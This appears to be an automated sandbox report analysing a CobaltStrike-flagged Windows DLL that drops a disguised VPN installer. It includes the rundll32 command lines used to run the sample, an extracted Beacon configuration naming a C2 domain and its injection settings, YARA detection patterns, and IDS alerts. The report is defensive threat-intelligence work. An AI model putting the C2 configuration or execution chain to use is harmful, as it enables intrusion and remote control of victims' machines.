Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll
(renamed file extension from exe to dll)
Original sample name:SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.exe
Analysis ID:1407646
MD5:188044dbe72707df496c5f5f6fde7d96
SHA1:821939aef0a4a14520c9a3fd6b4c28839ef5e7a5
SHA256:3927c345d61acfb52e6ddf5015033023b58df5b5c638cd6e7897a1b8e5bf98e7
Tags:exe
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Install WinpCap (used to filter network traffic)
Installs new ROOT certificates
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Execution from Suspicious Folder
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 6252 cmdline: loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 4256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4432 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 4688 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • 111.exe (PID: 3692 cmdline: C:\Users\Public\111.exe MD5: 25D325AFB078B572B0FBCA2B84AA264C)
          • cmd.exe (PID: 7244 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Program Files (x86)\Anycast\install.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • anycast-service.exe (PID: 7292 cmdline: anycast-service.exe stop MD5: 6575F6D7E539BC890ACC7587AA0D2507)
            • anycast-service.exe (PID: 7372 cmdline: anycast-service.exe uninstall MD5: 6575F6D7E539BC890ACC7587AA0D2507)
            • anycast-service.exe (PID: 7388 cmdline: anycast-service.exe install MD5: 6575F6D7E539BC890ACC7587AA0D2507)
            • dnscrypt-proxy.exe (PID: 7492 cmdline: dnscrypt\dnscrypt-proxy.exe -service install MD5: 9A040B1497076197702308784DE209A5)
            • dnscrypt-proxy.exe (PID: 7540 cmdline: dnscrypt\dnscrypt-proxy.exe -service start MD5: 9A040B1497076197702308784DE209A5)
          • Anycast.exe (PID: 7824 cmdline: C:\Program Files (x86)\Anycast\Anycast.exe MD5: DF90ED2B8D1C23A3AD6A8338BFE4A9C6)
    • rundll32.exe (PID: 3436 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_api_hash MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5708 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_execute_process MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6340 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_get_path MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2460 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_api_hash MD5: EF3179D498793BF4234F708D3BE28633)
      • 111.exe (PID: 1848 cmdline: C:\Users\Public\111.exe MD5: 25D325AFB078B572B0FBCA2B84AA264C)
        • cmd.exe (PID: 7936 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Program Files (x86)\Anycast\install.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 2232 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_execute_process MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1536 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_get_path MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5948 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_string MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5052 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_int MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5600 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_function MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2956 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_bool MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6768 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8context_get_current_context MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1276 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf8_to_utf16 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6004 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf8_clear MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7060 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_to_utf8 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 3292 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_set MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2072 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_cmp MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 528 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_clear MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6196 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_userfree_utf16_free MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 320 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_value MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1472 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_size MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2576 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_key MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1784 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_free MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2504 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_append MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 3116 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_alloc MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7172 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_map_value MD5: EF3179D498793BF4234F708D3BE28633)
  • anycast-service.exe (PID: 7428 cmdline: C:\Program Files (x86)\Anycast\anycast-service.exe MD5: 6575F6D7E539BC890ACC7587AA0D2507)
  • dnscrypt-proxy.exe (PID: 7572 cmdline: "C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe" -config dnscrypt-proxy.toml MD5: 9A040B1497076197702308784DE209A5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 8443, "SleepTime": 45000, "MaxGetSize": 1403644, "Jitter": 37, "MaxDNS": 255, "C2Server": "www.mxilws.buzz,/jquery-3.3.1.min.js", "UserAgent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", "HttpPostUri": "/jquery-3.3.2.min.js", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Metadata": ["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Host: mxilws.buzz", "Referer: http://mxilws.buzz/", "Accept-Encoding: gzip, deflate", "__cfduid=", "Cookie"], "HttpPost_Metadata": ["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Host: mxilws.buzz", "Referer: http://mxilws.buzz/", "Accept-Encoding: gzip, deflate", "__cfduid"], "PipeName": "", "DNS_Idle": "74.125.196.113", "DNS_Sleep": 0, "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 305419896, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": "Host: www.mxilws.buzz\r\n"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4451308422.000002044E250000.00000020.00000001.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
  • 0x176d4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000009.00000002.4450635070.000001B79C0CB000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
    00000009.00000002.4450635070.000001B79C0CB000.00000004.00000001.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
    • 0x758:$a31: Started service %s on %s
    • 0x798:$a39: %s as %s\%s: %d
    • 0x748:$a42: %s on %s: %d
    • 0x19d0:$a46: %s (admin)
    • 0x920:$a48: %s%s: %s
    • 0x7c4:$a50: %02d/%02d/%02d %02d:%02d:%02d
    • 0x7f0:$a50: %02d/%02d/%02d %02d:%02d:%02d
    • 0x1a19:$a51: Content-Length: %d
    00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
      00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
        Click to see the 23 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Execution from Suspicious Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\111.exe, CommandLine: C:\Users\Public\111.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\111.exe, NewProcessName: C:\Users\Public\111.exe, OriginalFileName: C:\Users\Public\111.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 4688, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Users\Public\111.exe, ProcessId: 3692, ProcessName: 111.exe

        Snort Signatures

        Timestamp:03/12/24-16:32:00.731418
        SID:2018581
        Source Port:49705
        Destination Port:8000
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/12/24-16:32:00.731671
        SID:2018581
        Source Port:49706
        Destination Port:8000
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/12/24-16:32:00.731671
        SID:2805877
        Source Port:49706
        Destination Port:8000
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/12/24-16:32:00.731418
        SID:2805877
        Source Port:49705
        Destination Port:8000
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Found malware configuration
        Source: 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 8443, "SleepTime": 45000, "MaxGetSize": 1403644, "Jitter": 37, "MaxDNS": 255, "C2Server": "www.mxilws.buzz,/jquery-3.3.1.min.js", "UserAgent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", "HttpPostUri": "/jquery-3.3.2.min.js", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Metadata": ["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Host: mxilws.buzz", "Referer: http://mxilws.buzz/", "Accept-Encoding: gzip, deflate", "__cfduid=", "Cookie"], "HttpPost_Metadata": ["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Host: mxilws.buzz", "Referer: http://mxilws.buzz/", "Accept-Encoding: gzip, deflate", "__cfduid"], "PipeName": "", "DNS_Idle": "74.125.196.113", "DNS_Sleep": 0, "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 305419896, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": "Host: www.mxilws.buzz\r\n"}
        Multi AV Scanner detection for submitted file
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllReversingLabs: Detection: 33%
        Machine Learning detection for sample
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllJoe Sandbox ML: detected
        Source: C:\Users\Public\111.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v3.06.1 Nullsoft Install System v3.06.1License AgreementPlease review the license terms before installing Anycast VPN 1.0.24.Press Page Down to see the rest of the agreement.This software is provided as is and any expressed or implied warranties including but not limited to the implied warranties of merchantability and fitness for a particular purpose are disclaimed. In no event shall Anycast LLC. be liable for any direct indirect incidental special exemplary or consequential damages (including but not limited to procurement of substitute goods or services; loss of use data or profits; or business interruption) however caused and on any theory of liability whether in contract strict liability or tort (including negligence or otherwise) arising in any way out of the use of this software even if advised of the possibility of such damage.If you accept the terms of the agreement click I Agree to continue. You must accept the agreement to install Anycast VPN 1.0.24.
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\Users\nmap\Source\Repos\npcap\packetWin7\vs14\x64\Release\Packet.pdb source: anycast-service.exe, 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmp, anycast-service.exe, 00000024.00000002.2149901394.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmp, anycast-service.exe, 00000025.00000002.2168078733.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmp, anycast-service.exe, 00000026.00000002.2305587215.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmp, Packet.dll.6.dr
        Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdb source: System.Configuration.ConfigurationManager.dll.6.dr
        Source: Binary string: C:\Users\admin\source\repos\3_1\libcef\x64\Release\libcef.pdb source: loaddll64.exe, 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4452591144.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4452955628.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.4452631373.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll
        Source: Binary string: Hardcodet.NotifyIcon.Wpf.pdbSHA256 source: Anycast.exe, 0000002B.00000002.4466233439.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp
        Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: Anycast.exe, 0000002B.00000002.4473917532.000000000CD02000.00000002.00000001.01000000.00000027.sdmp, Newtonsoft.Json.dll.6.dr
        Source: Binary string: D:\a\QRCoder\QRCoder\QRCoder\obj\Release\net40\QRCoder.pdb source: QRCoder.dll.6.dr
        Source: Binary string: /_/artifacts/obj/System.Text.Json/net461-Release/System.Text.Json.pdbSHA256> source: Anycast.exe, 0000002B.00000002.4468837667.0000000007232000.00000002.00000001.01000000.0000001E.sdmp
        Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdbSHA256h source: System.Configuration.ConfigurationManager.dll.6.dr
        Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4473917532.000000000CD02000.00000002.00000001.01000000.00000027.sdmp, Newtonsoft.Json.dll.6.dr
        Source: Binary string: D:\nt-driver-builder\wintun-0.14\Release\arm64\driver\wintun.pdbGCTL source: wintun.dll.6.dr
        Source: Binary string: C:\Projects\Anycast\Anycast.Windows\Anycast\obj\Release\Anycast.pdb source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe.6.dr
        Source: Binary string: C:\Users\Jason A. Donenfeld\Projects\wintun\Release\amd64\wintun.pdb source: wintun.dll.6.dr
        Source: Binary string: d:\agent\_work\8\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: anycast-service.exe, 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmp, anycast-service.exe, 00000024.00000002.2150000169.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmp, anycast-service.exe, 00000025.00000002.2168150348.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmp, anycast-service.exe, 00000026.00000002.2305751193.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmp, vcruntime140.dll.6.dr
        Source: Binary string: Sentry.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4458091074.0000000005AE2000.00000002.00000001.01000000.00000015.sdmp
        Source: Binary string: D:\a\QRCoder\QRCoder\QRCoder.Xaml\obj\Release\net40\QRCoder.Xaml.pdb source: QRCoder.Xaml.dll.6.dr
        Source: Binary string: C:\Projects\Anycast\Anycast.Windows.Service\target\release\deps\anycast_service.pdb source: anycast-service.exe, 00000022.00000000.2136854681.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000022.00000002.2141658275.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000024.00000000.2148298336.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000024.00000002.2149618744.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000025.00000000.2151447915.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000025.00000002.2167398699.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000026.00000002.2305155014.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000026.00000000.2166163273.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp
        Source: Binary string: C:\Users\Jason A. Donenfeld\Projects\wintun\Release\arm64\setupapihost.pdb source: wintun.dll.6.dr
        Source: Binary string: D:\nt-driver-builder\wintun-0.14\Release\amd64\driver\wintun.pdbGCTL source: wintun.dll.6.dr
        Source: Binary string: D:\nt-driver-builder\wintun-0.14\Release\arm64\driver\wintun.pdb source: wintun.dll.6.dr
        Source: Binary string: /_/artifacts/obj/System.Collections.Immutable/net461-Release/System.Collections.Immutable.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4464671863.0000000006DB2000.00000002.00000001.01000000.0000001B.sdmp, System.Collections.Immutable.dll.6.dr
        Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4454066671.0000000003772000.00000002.00000001.01000000.00000016.sdmp
        Source: Binary string: /_/artifacts/obj/System.Text.Encodings.Web/net461-Release/System.Text.Encodings.Web.pdbSHA256I source: Anycast.exe, 0000002B.00000002.4468046219.00000000071F2000.00000002.00000001.01000000.0000001F.sdmp
        Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdbSHA256 source: System.Security.Permissions.dll.6.dr
        Source: Binary string: C:\Projects\Anycast\Anycast.Windows\Anycast\obj\Release\Anycast.pdb0 source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe.6.dr
        Source: Binary string: /_/artifacts/obj/System.Reflection.Metadata/net461-Release/System.Reflection.Metadata.pdbSHA256[] source: Anycast.exe, 0000002B.00000002.4465512876.0000000006E32000.00000002.00000001.01000000.0000001A.sdmp
        Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: System.ValueTuple.dll.6.dr
        Source: Binary string: C:\BuildAgent\work\da2c3d9512902c54\Tooling\obj\Release\System.Net.Http.Formatting\System.Net.Http.Formatting.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4473569599.000000000CC52000.00000002.00000001.01000000.00000028.sdmp, System.Net.Http.Formatting.dll.6.dr
        Source: Binary string: D:\a\QRCoder\QRCoder\QRCoder\obj\Release\net40\QRCoder.pdbSHA256 P. source: QRCoder.dll.6.dr
        Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4464886117.0000000006DF2000.00000002.00000001.01000000.0000001C.sdmp
        Source: Binary string: /_/artifacts/obj/System.Text.Json/net461-Release/System.Text.Json.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4468837667.0000000007232000.00000002.00000001.01000000.0000001E.sdmp
        Source: Binary string: D:\nt-driver-builder\wintun-0.14\Release\amd64\driver\wintun.pdb source: wintun.dll.6.dr
        Source: Binary string: /_/artifacts/obj/System.Reflection.Metadata/net461-Release/System.Reflection.Metadata.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4465512876.0000000006E32000.00000002.00000001.01000000.0000001A.sdmp
        Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdbSHA256X^. source: Anycast.exe, 0000002B.00000002.4454066671.0000000003772000.00000002.00000001.01000000.00000016.sdmp
        Source: Binary string: /_/artifacts/obj/System.Text.Encodings.Web/net461-Release/System.Text.Encodings.Web.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4468046219.00000000071F2000.00000002.00000001.01000000.0000001F.sdmp
